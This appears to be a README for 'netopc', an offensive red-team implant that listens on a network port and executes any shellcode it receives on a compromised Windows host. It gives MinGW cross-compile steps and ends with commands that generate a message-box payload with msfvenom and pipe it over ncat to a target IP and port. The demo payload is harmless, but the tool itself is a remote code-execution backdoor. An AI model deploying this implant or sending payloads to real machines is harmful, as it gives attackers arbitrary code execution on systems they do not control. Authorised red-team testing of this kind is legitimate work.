netopc
is a tool designed for red team operations to enable remote execution of shellcode on compromised systems.
It functions by listening for network connections, receiving raw machine code (shellcode), and executing the received code in a separate process.
- Linux environment
- MinGW-w64 toolchain installed for cross-compiling to Windows targets
- Standard development tools (make, gcc)
Clean the project files:
make clean
Use the following command to compile the project for x86 architecture:
make CC=i686-w64-mingw32-gcc
For compiling the project to support x64 architecture, use the x64 specific MinGW-w64 compiler:
make CC=x86_64-w64-mingw32-gcc
Execute the compiled binary on a Windows machine or in a test environment:
./netopc.exe
Use this command to start up netopc
:
PS C:\Users\User> .\netopc.exe
Use the following commands to generate shellcode that pops up a message box and then execute it remotely on the compromised system where netopc
is running:
msfvenom -p windows/messagebox -f raw > shellcode.bin
cat shellcode.bin |ncat 192.168.56.104 42000